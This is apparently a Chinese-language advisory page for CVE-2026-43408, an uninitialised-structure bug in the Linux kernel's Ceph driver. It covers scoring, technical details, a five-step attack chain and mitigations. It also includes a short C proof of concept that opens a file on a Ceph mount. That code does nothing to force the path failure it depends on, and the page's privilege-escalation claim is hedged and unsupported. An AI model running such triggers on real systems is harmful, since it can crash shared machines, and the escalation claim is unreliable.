CVE-2026-43408 Linux内核Ceph路径信息未初始化漏洞

漏洞信息

漏洞编号

CVE-2026-43408

漏洞类型

内存破坏

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核中的Ceph文件系统组件存在安全漏洞，由于`ceph_mdsc_build_path()`调用时未对`ceph_path_info`参数进行零初始化，导致后续的内存释放操作可能引发内核崩溃。攻击者利用此漏洞可导致本地拒绝服务，并可能提升权限。

技术细节

该漏洞位于Linux内核的Ceph文件系统驱动中。`ceph_mdsc_build_path()`函数期望传入的`ceph_path_info`结构体已被初始化，但部分调用者未遵守此约定。当函数执行失败返回错误时，调用者会调用`ceph_mdsc_free_path_info()`释放资源。由于结构体未初始化，其中包含的指针随机，导致`kmem_cache_free`操作访问无效的Slab缓存，触发`BUG()`并造成内核崩溃。虽然主要表现为DoS，但对未初始化内存的利用可能导致本地权限提升。

攻击链分析

STEP 1

1

攻击者获得本地低权限用户访问权限。

STEP 2

2

攻击者针对挂载的Ceph文件系统执行特定文件操作（如打开文件）。

STEP 3

3

触发`ceph_mdsc_build_path`函数执行失败。

STEP 4

4

系统调用`ceph_mdsc_free_path_info`释放未初始化的内存结构。

STEP 5

5

内核发生Slab缓存错误导致崩溃或权限提升。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>

/*
 * PoC for CVE-2026-43408
 * Triggering the uninitialized ceph_path_info vulnerability.
 * Requires a mounted Ceph filesystem.
 */

int main() {
    const char *target_file = "/mnt/ceph/vulnerable_file";
    int fd;

    // Attempt to open a file on the Ceph mount
    // This triggers ceph_open -> ceph_mdsc_build_path
    fd = open(target_file, O_RDONLY | O_CREAT);
    if (fd < 0) {
        perror("Failed to open file");
        return 1;
    }

    // If the kernel is vulnerable and the path build fails internally,
    // the uninitialized memory free may crash the system here or on close.
    close(fd);
    
    printf("PoC executed. Check kernel logs for crashes.\n");
    return 0;
}

影响范围

Linux Kernel 6.18.12

防御指南

临时缓解措施

限制非特权用户对Ceph文件系统的访问权限，或暂时禁用受影响的内核模块。